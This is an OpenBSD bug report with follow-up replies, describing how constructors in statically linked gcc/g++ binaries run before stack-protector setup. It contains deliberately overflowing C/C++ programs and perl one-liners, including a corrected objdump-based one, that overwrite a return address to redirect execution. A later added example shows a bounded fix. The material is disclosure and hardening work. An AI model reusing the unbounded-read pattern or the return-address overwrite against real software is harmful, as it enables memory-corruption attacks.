system/5229: gcc,g++ - constructors in statically linked programs enjoy limited stack protection


system/5229: gcc,g++ - constructors in statically linked programs enjoy limited stack protection

Paul Stoeber
>Number:         5229
>Category:       system
>Synopsis:       gcc,g++ - constructors in statically linked programs enjoy limited stack protection
>Confidential:   yes
>Severity:       serious
>Priority:       medium
>Responsible:    bugs
>State:          open
>Quarter:        
>Keywords:      
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Wed Sep 06 22:10:01 GMT 2006
>Closed-Date:
>Last-Modified:
>Originator:     Paul Stoeber
>Release:        3.9
>Organization:
net
>Environment:
        System      : OpenBSD 3.9
        Architecture: OpenBSD.i386
        Machine     : i386
>Description:
$ cat x.c
#include <unistd.h>
#include <string.h>
static void f1(void) __attribute__((constructor));
static void f1(void) {
  char buf[16];
  read(0, buf, 48);
}
static void f2(void) {
  write(1, "surprise\n", 9);
  _exit(0);
}
int main() { return 0; }
$ gcc -static x.c
$ perl -e 'print "\0"x44,"\x51\x03\x00\x1c"' | ./a.out
surprise
$ cat x.cpp
#include <unistd.h>
class A { public: A(); };
A::A() {
  char buf[16];
  read(0,buf,48);
}
A a;
static void f2(void) {
  write(1, "surprise\n", 9);
  _exit(0);
}
int main() { return 0; }
$ g++ -static x.cpp
$ perl -e 'print "\0"x44,"\xa0\x03\x00\x1c"' | ./a.out
surprise
$ uname -mrsv
OpenBSD 3.9 GENERIC#617 i386
$

The snapshot of Sep 2 2006 also has this problem.

>How-To-Repeat:
>Fix:
Invoke __guard_setup earlier?


>Release-Note:
>Audit-Trail:
>Unformatted:
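
An added example, written for this page and not part of PR 5229 or of Paul Stoeber's demo: it shows the hardened counterpart of the report's constructor. Because a constructor in a static binary may run before __guard_setup() has initialised the canary, the code inside it cannot count on ProPolice catching an overrun, so the read must be bounded by the buffer itself (sizeof buf) rather than by a caller-chosen count. The helper names read_bounded, feed_and_read, demo_truncates and constructor_ran are mine, the 48-byte input is constructed in the code, and the poll() with a zero timeout is an addition so the example never blocks when stdin has no data. It assumes a POSIX system with pipe() and poll(); it compiles with either gcc or g++.

```c
#include <errno.h>
#include <poll.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Set by the constructor below so main() (or a test) can confirm that
 * constructor code really ran before it. */
static int g_ctor_ran = 0;
static ssize_t g_ctor_bytes = 0;

int constructor_ran(void) { return g_ctor_ran; }

/* Bounded replacement for the report's read(0, buf, 48): reads at most
 * cap - 1 bytes into a cap-byte buffer and NUL-terminates it, so an
 * oversized input is truncated instead of running past the array.
 * Returns the number of bytes stored, or -1 on error. */
ssize_t read_bounded(int fd, char *buf, size_t cap)
{
    size_t got = 0;
    if (cap == 0)
        return -1;
    while (got < cap - 1) {
        ssize_t n = read(fd, buf + got, cap - 1 - got);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (n == 0)            /* EOF: stop early */
            break;
        got += (size_t)n;
    }
    buf[got] = '\0';
    return (ssize_t)got;
}

/* Hardened counterpart of f1() in the report. It runs before main() and,
 * in a static binary, possibly before __guard_setup(), so it must not
 * rely on the canary: the read is bounded by sizeof buf. The zero-timeout
 * poll() is an added convenience so the example never blocks on an idle
 * terminal or pipe. */
static void f1(void) __attribute__((constructor));
static void f1(void)
{
    char buf[16];
    struct pollfd pfd = { 0, POLLIN, 0 };
    g_ctor_ran = 1;
    if (poll(&pfd, 1, 0) > 0)
        g_ctor_bytes = read_bounded(0, buf, sizeof buf);
}

/* Test helper: push 'len' bytes through a pipe and read them back with
 * read_bounded() into a buffer of 'cap' bytes. Returns what read_bounded()
 * returned (the pipe is a stand-in for the report's stdin). */
ssize_t feed_and_read(const char *data, size_t len, char *buf, size_t cap)
{
    int fds[2];
    size_t off = 0;
    ssize_t r;
    if (pipe(fds) != 0)
        return -1;
    while (off < len) {
        ssize_t w = write(fds[1], data + off, len - off);
        if (w < 0) { close(fds[0]); close(fds[1]); return -1; }
        off += (size_t)w;
    }
    close(fds[1]);             /* writer closed: reader sees EOF after the data */
    r = read_bounded(fds[0], buf, cap);
    close(fds[0]);
    return r;
}

/* Constructed check: a 48-byte input (three times the 16-byte target, as in
 * the PR) must be truncated to 15 bytes plus NUL, and sentinel bytes placed
 * right after the target must be untouched. Returns 1 on success, 0 otherwise. */
int demo_truncates(void)
{
    char input[48];
    struct { char target[16]; char sentinel[8]; } frame;
    ssize_t n;
    size_t i;
    memset(input, 'A', sizeof input);
    memset(&frame, 0x5a, sizeof frame);
    n = feed_and_read(input, sizeof input, frame.target, sizeof frame.target);
    if (n != 15 || frame.target[15] != '\0')
        return 0;
    for (i = 0; i < sizeof frame.sentinel; i++)
        if (frame.sentinel[i] != 0x5a)
            return 0;
    return 1;
}

int main(void)
{
    int ok = demo_truncates();
    printf("constructor ran before main: %d, bytes read in constructor: %zd\n",
           constructor_ran(), g_ctor_bytes);
    printf("48-byte input into 16-byte buffer: %s\n", ok ? "truncated safely" : "FAILED");
    return ok ? 0 : 1;
}
```

Build it as in the report (`gcc -static example.c` or `g++ -static example.cpp`) and pipe any oversized input into it; the constructor stores at most 15 bytes and main() still runs. The ordering bug itself (__guard_setup() after constructors) is the toolchain's to fix; the point of the example is that constructor code must stay in bounds on its own.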

Re: system/5229: gcc,g++ - constructors in statically linked programs enjoy limited stack protection

Paul Stoeber
The overrun demos are wrong.  Sorry.  Try

perl -e 'print "\0"x44,pack("I",0x'$(objdump -t a.out | awk '/f2.?$/{print $1}')')' | ./a.out

instead, in both cases.

Re: system/5229: gcc,g++ - constructors in statically linked programs enjoy limited stack protection

Paul Stoeber
The following reply was made to PR system/5229; it has been noted by GNATS.

From: Paul Stoeber <[hidden email]>
To: [hidden email], [hidden email]
Cc:  
Subject: Re: system/5229: gcc,g++ - constructors in statically linked programs enjoy limited stack protection
Date: Wed, 6 Sep 2006 22:51:28 +0000

The overrun demos are wrong.  Sorry.  Try

perl -e 'print "\0"x44,pack("I",0x'$(objdump -t a.out | awk '/f2.?$/{print $1}')')' | ./a.out

instead, in both cases.